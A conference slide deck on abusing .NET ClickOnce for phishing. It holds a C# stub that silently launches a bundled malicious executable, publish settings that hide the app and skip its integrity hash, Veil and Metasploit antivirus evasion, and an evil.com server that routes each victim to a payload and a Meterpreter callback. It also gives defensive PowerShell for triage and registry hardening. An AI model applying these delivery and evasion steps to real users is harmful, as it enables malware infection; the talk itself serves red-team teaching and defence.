All You Need is One - A ClickOnce Love Story - Secure360 2015


Celebrating a decade of guiding security professionals.

@Secure360 or #Sec360 www.Secure360.org

All You Need Is One - A ClickOnce Love Story

Ryan Gandrud

Cody Wass


Introduction

• Ryan Gandrud

– Penetration tester

– Computer enthusiast

• Cody Wass

– Web applications

– Scotch aficionado


Overview

• ClickOnce?

• Phishing-phriendly pheatures

• Creating a malicious ClickOnce application

• Phishing setup

• Issues and pitfalls

• Demo

• Prevention


ClickOnce WTF?

• ClickOnce – What is it?

– ClickOnce is a .NET deployment technology: a set of manifests wrapped around a Windows executable that “installs” it for the current user, with no administrator rights required

– Used by application administrators to deploy installations to users on the network

– Supports multiple deployment methods (web, network share, local execution)


ClickOnce Internals

• ProjectName.application – The deployment manifest: contains the location of the application manifest, the URL of the deployment provider and the application version

• ProjectName.exe.config.deploy – Contains application settings (i.e. connection strings, etc.)

• ProjectName.exe.deploy – The (potentially malicious) executable that will be run by the user

• ProjectName.exe.manifest – The application manifest: contains the application version, .NET versions supported, the permission level requested, and hashes (plus an optional signature) for the other files

– Contains the file name of the executable to launch (the entry point)

• The .deploy suffix is added when “Use .deploy file extension” is enabled in the publish options so that web servers hand out the files without extra MIME mappings; the runtime strips it after download


ClickOnce Certificate Signing

• ClickOnce and .NET support signing the deployment and application manifests

• Authenticode – Microsoft’s certificate-based code-signing technology, used to verify the authenticity of the publisher

• To sign, you need to “acquire” a code-signing Authenticode certificate from a Certificate Authority (CA)

• Signing stages available

– Signed (CA-issued certificate)

– Self-signed (a test certificate from MakeCert.exe or the one Visual Studio generates for you)

– Unsigned (no cert used)
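As an added example (not part of the deck, and not NetSPI’s code): a PowerShell triage script that reads the two manifests described on the Internals and Signing slides and reports what a responder wants to know before anyone clicks Run: the origin URL, the install mode, whether either manifest carries a signature, whether Full Trust is requested, and which shipped files have no integrity hash. Element and attribute names follow the real ClickOnce manifest schema; the two sample manifests are constructed for this example, reusing the deck’s “Evil Survey” / ClickOnceInc.exe names plus a hypothetical evil.com URL. The optional -BaseDirectory hash check assumes you fetched the .deploy files next to the manifests.

```powershell
# Added example, not from the Secure360 deck: triage a ClickOnce deployment
# manifest (.application) together with the application manifest it points at,
# before anyone clicks Run. Element and attribute names follow the real ClickOnce
# manifest schema; both sample manifests are constructed for this example and
# reuse the deck's "Evil Survey" / ClickOnceInc.exe names plus a hypothetical
# evil.com URL. PowerShell 3 or later.

function Test-ClickOnceFileHash {
    # One row per shipped file: does the manifest carry a hash for it, and does
    # the file on disk (published as <name>.deploy) actually match that hash?
    param([string]$Name, $HashNode, [string]$BaseDirectory)
    $row = [ordered]@{ File = $Name; HashInManifest = [bool]$HashNode; Verified = 'file not available' }
    if (-not $HashNode) {
        # What "Exclude" in the Application Files dialog produces: the runtime
        # never checks this file, so the binary can change after publishing.
        $row.Verified = 'NO INTEGRITY HASH'
        return [pscustomobject]$row
    }
    if ($BaseDirectory) {
        $path = @("$Name.deploy", $Name) | ForEach-Object { Join-Path $BaseDirectory $_ } |
                Where-Object { Test-Path -LiteralPath $_ } | Select-Object -First 1
        if ($path) {
            $algo   = if ($HashNode.DigestMethod.Algorithm -match 'sha256') { 'SHA256' } else { 'SHA1' }
            $hasher = [System.Security.Cryptography.HashAlgorithm]::Create($algo)
            $actual = [Convert]::ToBase64String($hasher.ComputeHash([System.IO.File]::ReadAllBytes($path)))
            $row.Verified = if ($actual -eq $HashNode.DigestValue.Trim()) { 'OK' } else { 'MISMATCH' }
        }
    }
    [pscustomobject]$row
}

function Get-ClickOnceManifestReport {
    param([Parameter(Mandatory)][xml]$Deployment,
          [Parameter(Mandatory)][xml]$Application,
          [string]$BaseDirectory)      # folder holding the .deploy files, if you fetched them
    $dep = $Deployment.assembly; $app = $Application.assembly
    $files = @()
    # Assemblies are <dependency><dependentAssembly codebase=...>; loose content such as
    # a dropped .exe is a <file name=...>. Prerequisites (the CLR itself) have no codebase.
    foreach ($d in @($app.dependency)) {
        $da = $d.dependentAssembly
        if ($da -and $da.dependencyType -eq 'install') {
            $files += Test-ClickOnceFileHash $da.codebase $da.hash $BaseDirectory
        }
    }
    foreach ($f in @($app.file)) {
        if ($f) { $files += Test-ClickOnceFileHash $f.name $f.hash $BaseDirectory }
    }
    [pscustomobject]@{
        Name               = $dep.assemblyIdentity.name
        Version            = $dep.assemblyIdentity.version
        Origin             = $dep.deployment.deploymentProvider.codebase   # URL the runtime re-contacts
        InstallMode        = if ($dep.deployment.install -eq 'true') { 'install (Start Menu entry)' } else { 'online-only' }
        DeploymentSigned   = [bool]($dep.Signature)
        ApplicationSigned  = [bool]($app.Signature)
        FullTrustRequested = ($app.trustInfo.security.applicationRequestMinimum.PermissionSet.Unrestricted -eq 'true')
        EntryPoint         = $app.entryPoint.commandLine.file
        Files              = $files
    }
}

# Constructed sample: unsigned, online-only, Full Trust, payload hash excluded.
[xml]$deployManifest = @'
<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v2"
    xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
  <assemblyIdentity name="Evil Survey.application" version="1.0.0.0" publicKeyToken="0000000000000000"
    language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />
  <deployment install="false" mapFileExtensions="true">
    <deploymentProvider codebase="http://evil.com/a1b2c3/Evil%20Survey.application" />
  </deployment>
</asmv1:assembly>
'@
[xml]$appManifest = @'
<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v2"
    xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">
  <asmv1:assemblyIdentity name="Evil Survey.exe" version="1.0.0.0" type="win32" />
  <entryPoint><commandLine file="Evil Survey.exe" parameters="" /></entryPoint>
  <trustInfo><security><applicationRequestMinimum>
    <PermissionSet Unrestricted="true" ID="Custom" SameSite="site" />
  </applicationRequestMinimum></security></trustInfo>
  <dependency>
    <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="Evil Survey.exe" size="5632">
      <hash>
        <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
        <dsig:DigestValue>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=</dsig:DigestValue>
      </hash>
    </dependentAssembly>
  </dependency>
  <file name="ClickOnceInc.exe" size="73802" />
</asmv1:assembly>
'@

$report = Get-ClickOnceManifestReport -Deployment $deployManifest -Application $appManifest
$report | Select-Object * -ExcludeProperty Files | Format-List
$report.Files | Format-Table -AutoSize
```

Against a real pair, load the files with [xml](Get-Content -Raw 'Evil Survey.application') and pass the publish folder as -BaseDirectory. A package built the way this deck describes lights up three rows at once: DeploymentSigned false, FullTrustRequested true, and a content file reported as NO INTEGRITY HASH.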


ClickOnce Trust Architecture

• How an application is allowed to run depends on the security zone of the location it was launched from; ClickOnce reuses the Internet Explorer URL zones (My Computer, Local Intranet, Trusted Sites, Internet, Untrusted Sites)

• ClickOnce allows an application to obtain more permissions than its zone grants, either automatically (when the request is already covered by policy, e.g. a publisher in the Trusted Publishers store) or by prompting the user

• Prompting levels are controlled per zone by the following registry key

– HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel


ClickOnce Trust Architecture (cont.)

• Microsoft describes this as a feature: “But the most important new feature when it comes to security is … the end user can elevate permissions without the help of an administrator”

• “If the application permissions don't exceed policy permissions, the application downloads and runs without asking the user any trust questions.”

• “If the application needs more permissions than what's granted by policy, the user is asked if he wants to trust that application and elevate permissions... If the user clicks Run, the application is put into the Application Trust List and is downloaded and started.”

MSDN: https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx


ClickOnce Trust Architecture (cont.)

• When ClickOnce was originally being developed in .NET 2.0 Beta 2, permissions looked promising, with the Internet zone restricted to applications signed by a valid certificate:

Zone              Applications
My Computer       Enabled
Local Intranet    Enabled
Trusted Sites     Enabled
Internet          Enabled for signed apps only
Untrusted Sites   Disabled


ClickOnce Trust Architecture (cont.)

• Unfortunately, Microsoft changed this before release, specifically for the Internet zone, and not for the better

• Now, by default, a ClickOnce package that comes from the Internet, signed or not, lets the user grant it Full Trust through the trust prompt in order to install. No administrator is involved: the application still runs as the user, but with unrestricted .NET permissions

Zone              Applications
My Computer       Enabled
Local Intranet    Enabled
Trusted Sites     Enabled
Internet          Enabled
Untrusted Sites   Disabled


Owning With a Click

• Why use a ClickOnce application?

– ClickOnce is supported on all modern Windows operating systems since it relies only on .NET

– Windows has shipped with at least .NET 2.0 since the Windows Server 2003 era; Vista and later include .NET 3.0 or newer out of the box

– .NET is backwards compatible, so an application targeting .NET 2.0/3.5 runs nearly everywhere

– Dead simple to write

– Public browser exploits are highly version specific and, more often than not, crash the victim’s browser


Owning With a Click (cont.)

• Originally meant to be deployed using Internet Explorer

– ClickOnce is supported by IE 6.0+

– Now also works in Firefox and Chrome through add-ons (Microsoft’s own .NET Framework Assistant for Firefox shipped with .NET 3.5 SP1; third-party extensions for Chrome)

• Minimizes user interaction: one click on the link, one click on the trust prompt

• Multiple options for delivering the malicious code

– It’s a .NET project – write your own

– Include a malicious executable as a resource and launch it


Payloads

• Roll your own payload

– Our original vector

– Flagged by AV

• Standard Metasploit payload

– Also attempted

– reverse_https returned broken shells

• Assumed to be AV, or something inline during delivery of the second Meterpreter stage


Payloads (cont.)

• PowerShell

– Justin (@sixdub) did a great write-up on using a PowerShell command instead of an executable for a Meterpreter callback with ClickOnce

– Pros:

• The PowerShell command runs in memory – the stager never touches disk

– Cons:

• Difficulty in changing payloads

• The ClickOnce application itself is already on disk

http://www.sixdub.net/?p=555


Payloads (cont.)

• Veil

– Pros:

• Payloads written in different languages

• Encrypted payloads – less likely to get caught by AV

– Cons:

• Static “random” Meterpreter callback

• This is an issue with how Metasploit handles stagers – will be fixed (hopefully) soon (metasploit-framework issue #4895)

• We decided to go with Veil since we needed to avoid AV detection during our red team engagement


Payloads (cont.)

• Problem:

– Static Meterpreter callbacks from targets

• Solution?:

– Dynamically generating individualized Veil payloads


Creating a ClickOnce Application

• Visual Studio is used to create ClickOnce applications

– The free edition of Visual Studio 2013 supports ClickOnce publishing

• Start a new console application project within Visual Studio

– No GUI to design or for the user to interact with; the stub only has to launch the included payload


Creating a ClickOnce Application (cont.)

• Using C# in .NET, create a new process that launches your included executable (ClickOnceInc.exe)

    using System;
    using System.Diagnostics;
    using System.IO;

    static class Program
    {
        static void Main()
        {
            // ClickOnce copies every published file into the same per-user app
            // folder, so resolve the payload next to this stub instead of
            // trusting the process working directory
            string payload = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "ClickOnceInc.exe");

            // Start a new process executing the (malicious) exe: no shell,
            // no redirected output, nothing for the user to notice
            Process p = new Process();
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardOutput = false;
            p.StartInfo.FileName = payload;
            p.Start();
        }
    }


Creating a ClickOnce Application (cont.)

• Ensure that your application uses the correct version of .NET so the application runs properly.

• Here, .NET 3.5 was chosen by navigating to the Application tab on the left, and selecting the Target Framework from the dropdown.



Creating a ClickOnce Application (cont.)

• Include your malicious binary into the project by clicking and dragging it over your Solution Explorer


Creating a ClickOnce Application (cont.)

• In the Properties of the application under Publish:

– Ensure the Install Mode is set to “The application is available online only”

• This prevents the application from showing up in the Start Menu and in Add/Remove Programs

– Click the Application Files… button and set the Hash column for ClickOnceInc.exe to Exclude

• Dynamic payload generation changes the binary, and with it the hash; with the hash excluded, the runtime never checks that file



Creating a ClickOnce Application (cont.)

• Clicking the Publish button, follow the wizard to publish the ClickOnce application to your local drive

• There should be multiple files/directories

– Application Files directory

– Evil Survey.application

– Publish.htm

– Setup.exe



Server Setup

• Web server with a ClickOnce-specific directory per target

– Kali with Veil, Metasploit, and Apache

• Apache mod_rewrite

– GET evil.com?u={ID} -> evil.com/{ID}/evil.application

– Combined with dynamically generated Veil payloads, this allowed easy analytics and post-mortem data gathering: each {ID} ties a click and its callback to one recipient


Callback Listener

• Our solution: a Metasploit listener

– Phishing scenario – the targets are workstations

– Most likely have outbound HTTP access

– Limited window of engagement

• Egress filtering – fallbacks: SSH / ICMP / DNS tunneling


Pitfalls

• Outdated packages / dependencies

– Veil, Python, Wine

• Signing restrictions

– No signing possible with dynamically generated payloads

• No easy way to run mage.exe on Linux

– Self-signed certs are only marginally better than unsigned


Cleanup

• ClickOnce install directory:

– %LOCALAPPDATA%\Apps\2.0\{machine-specific}\{machine-specific}\{obfuscated-app-name}

• C:\Users\Bob\AppData\Local\Apps\2.0\F3RBL2XD.32Y\Z3R2E8LL.92S\{app-folder}


Cleanup (cont.)

• Add/Remove Programs (only lists applications installed with “available offline”)

• Delete the relevant AppData folder

• Nuke everything:

– Note: this clears the entire online application cache for the user

– No elevated privileges needed – app caches are user-specific

    rundll32 dfshim CleanOnlineAppCache
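As an added example (not from the deck): before running either cleanup above, inventory what ClickOnce has cached for the user, so the responder keeps the evidence (app identity, version, entry point, first-seen time, origin URL where a deployment manifest is present) that the “nuke everything” command destroys. The folder layout follows the Cleanup slide; the two machine-specific folder names are random per machine, so the script finds manifests by recursion rather than hard-coding them. The CSV path is a placeholder.

```powershell
# Added example, not from the Secure360 deck: inventory the per-user ClickOnce
# cache before cleaning it. Layout follows the Cleanup slide
# (%LOCALAPPDATA%\Apps\2.0\<rnd>\<rnd>\...); the random folder names are
# discovered by recursion. PowerShell 3 or later, no elevation required.

function Get-ClickOnceCacheInventory {
    param([string]$Root = (Join-Path $env:LOCALAPPDATA 'Apps\2.0'))
    if (-not (Test-Path -LiteralPath $Root)) { return }
    # Every deployed app leaves an XML application manifest (*.manifest) in the
    # cache; deployment manifests (*.application), when present, also carry the
    # origin URL in deployment/deploymentProvider.
    Get-ChildItem -Path $Root -Recurse -Include '*.manifest', '*.application' -ErrorAction SilentlyContinue |
        ForEach-Object {
            try { $asm = ([xml][System.IO.File]::ReadAllText($_.FullName)).assembly } catch { return }
            if (-not $asm.assemblyIdentity) { return }        # not a ClickOnce manifest
            [pscustomobject]@{
                App        = $asm.assemblyIdentity.name
                Version    = $asm.assemblyIdentity.version
                Signed     = [bool]($asm.Signature)
                EntryPoint = $asm.entryPoint.commandLine.file
                Origin     = $asm.deployment.deploymentProvider.codebase
                FirstSeen  = $_.CreationTime                  # when the runtime wrote it
                Manifest   = $_.FullName
            }
        }
}

$inventory = Get-ClickOnceCacheInventory
$inventory | Sort-Object FirstSeen -Descending |
    Format-Table App, Version, Signed, EntryPoint, Origin, FirstSeen -AutoSize
# Save the evidence first (placeholder path); the cleanup below is irreversible.
$inventory | Export-Csv -Path (Join-Path $env:TEMP 'clickonce-inventory.csv') -NoTypeInformation

# Targeted cleanup: remove only the Apps\2.0\<rnd>\<rnd>\<obfuscated-app> folder
# that the Manifest column pointed you at.
#   Remove-Item -LiteralPath '<that app folder>' -Recurse -Force
# Scorched earth (the deck's command): clears every online-only app for this user.
#   rundll32 dfshim CleanOnlineAppCache
```

The FirstSeen column is the NTFS creation time of the manifest, which is the closest thing the cache offers to “when did this user first run it”; correlate it with the proxy log for the Origin URL before the folder is removed.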


Demo

• Client:

– Windows 7

• Server (evil.com):

– Kali running Apache to serve file

– Metasploit listener running to catch callback


Preventative Measures

• Typical anti-phishing techniques

– User education

• Users click through “… a quarter of Google Chrome’s malware and phishing warnings” (Akhawe and Porter Felt, Alice in Warningland)

– Endpoint protection

• Signatures lag behind usage

• Heuristics require a practical balance

• Limited usefulness against other phishing-based vectors

– Least-privilege configurations


Preventative Measures (cont.)

• ClickOnce-specific techniques

– Code Access Security

• ClickOnce applications specify a “permissions level” in the application manifest

• Visual Studio’s default is Full Trust, which requires the trust prompt for elevation in any zone that grants less; an application published with a partial-trust permission set within the zone’s policy runs without prompting and without elevation


Preventative Measures

• Disabling Trust Prompt– \HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFra

mework\Security\TrustManager\PromptingLevel

– Trust prompt is controlled by zone• Untrusted Sites

• Internet

• My Computer

• Local Intranet

• Trusted Sites


Preventative Measures (cont.)

Default value of each per-zone string value under PromptingLevel:

String value     Default
MyComputer       Enabled
LocalIntranet    Enabled
TrustedSites     Enabled
Internet         Enabled
UntrustedSites   Disabled

Legal settings for each string value:

Option                       Registry setting value
Enable the trust prompt      Enabled
Restrict the trust prompt    AuthenticodeRequired
Disable the trust prompt     Disabled

• AuthenticodeRequired shows the prompt only for applications signed with a certificate that chains to a trusted CA; Disabled shows no prompt at all, so an application from that zone runs only if its publisher is already in the Trusted Publishers store
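As an added example (not from the deck): a PowerShell audit of the per-zone trust prompt settings shown in the two tables above, and a Set- function that enforces a hardened policy. This serves both the Trust Architecture slide, where the PromptingLevel key is introduced, and this one. The key path, value names and the three legal settings are the documented ones; the $Desired policy (no prompt for the Internet zone, Authenticode required for Trusted Sites) is this example’s recommendation, not something the deck prescribes. Because the key lives under HKLM, the Set- function needs an elevated shell.

```powershell
# Added example, not from the Secure360 deck: audit the ClickOnce trust prompt
# per zone and enforce a hardened policy. Key path, value names and the three
# legal settings are the documented ones (MSDN, "How to: Configure the ClickOnce
# Trust Prompt Behavior"); the $Desired policy is this example's recommendation.
# PowerShell 3 or later; Set- needs an elevated shell (the key is under HKLM).

$PromptingLevelKey = 'HKLM:\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel'
$Zones   = 'MyComputer', 'LocalIntranet', 'TrustedSites', 'Internet', 'UntrustedSites'
$Allowed = 'Enabled', 'AuthenticodeRequired', 'Disabled'

# Hardened policy: no prompt at all for the Internet zone (the phishing path in
# this talk), a prompt only for CA-signed apps from Trusted Sites, defaults
# elsewhere. UntrustedSites is Disabled by default already but is written
# explicitly so that deleting the value cannot loosen it.
$Desired = @{
    Internet       = 'Disabled'
    UntrustedSites = 'Disabled'
    TrustedSites   = 'AuthenticodeRequired'
    LocalIntranet  = 'Enabled'
    MyComputer     = 'Enabled'
}

function Get-ClickOncePromptingLevel {
    # One row per zone. A missing value means "default": Enabled for every zone
    # except UntrustedSites, which defaults to Disabled.
    foreach ($zone in $Zones) {
        $configured = $null
        if (Test-Path $PromptingLevelKey) {
            $configured = (Get-ItemProperty -Path $PromptingLevelKey -Name $zone -ErrorAction SilentlyContinue).$zone
        }
        $effective = if ($configured) { $configured } elseif ($zone -eq 'UntrustedSites') { 'Disabled' } else { 'Enabled' }
        [pscustomobject]@{
            Zone       = $zone
            Configured = $configured
            Effective  = $effective
            Desired    = $Desired[$zone]
            Compliant  = ($effective -eq $Desired[$zone])
        }
    }
}

function Set-ClickOncePromptingLevel {
    # Writes $Desired. Run elevated; a standard user (the population this phishing
    # vector targets) cannot loosen an HKLM value afterwards. Supports -WhatIf.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    foreach ($zone in $Zones) {
        if ($Allowed -notcontains $Desired[$zone]) { throw "Illegal setting '$($Desired[$zone])' for $zone" }
    }
    if (-not (Test-Path $PromptingLevelKey)) { New-Item -Path $PromptingLevelKey -Force | Out-Null }
    foreach ($zone in $Zones) {
        if ($PSCmdlet.ShouldProcess("$PromptingLevelKey\$zone", "Set to $($Desired[$zone])")) {
            Set-ItemProperty -Path $PromptingLevelKey -Name $zone -Value $Desired[$zone] -Type String
        }
    }
}

Get-ClickOncePromptingLevel | Format-Table -AutoSize
Set-ClickOncePromptingLevel -WhatIf      # preview; drop -WhatIf from an elevated prompt to enforce
```

Disabled for a zone does not merely hide the prompt: an application from that zone whose publisher is not in the Trusted Publishers store is refused outright. Before pushing this through Group Policy, make sure any legitimate internal ClickOnce application is served from an intranet or Trusted Sites URL, or that its signing certificate has been distributed to Trusted Publishers.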


Preventative Measures (cont.)

• Windows 8

– SmartScreen filter

• Enabled by default

• Adds another layer after the user clicks ‘Run’ for anything not signed by a recognized CA

• The default ‘OK’ button results in the application not running; the user has to click “More info” and then “Run anyway” to get past it


Flowchart by Robin Shahan (@robindotnet)


Questions?


More Information / References

• Alice in Warningland: A Large-Scale Field Study of Browser Security Warning Effectiveness

– Devdatta Akhawe (University of California, Berkeley) and Adrienne Porter Felt (Google, Inc.), USENIX Security 2013

• http://leastprivilege.com/2006/02/18/beware-be-aware-of-clickonce-default-settings/

• https://msdn.microsoft.com/en-us/library/aa719097(v=vs.71).aspx

• https://msdn.microsoft.com/en-us/library/cc176048(v=vs.90).aspx

• https://msdn.microsoft.com/en-us/library/ee308453.aspx

• https://robindotnet.wordpress.com/2013/02/24/windows-8-and-clickonce-the-definitive-answer-2/

• https://blog.netspi.com/bypassing-av-with-veil-evasion/

• https://github.com/rapid7/metasploit-framework/issues/4895

• http://www.sixdub.net/?p=555

• https://blog.netspi.com/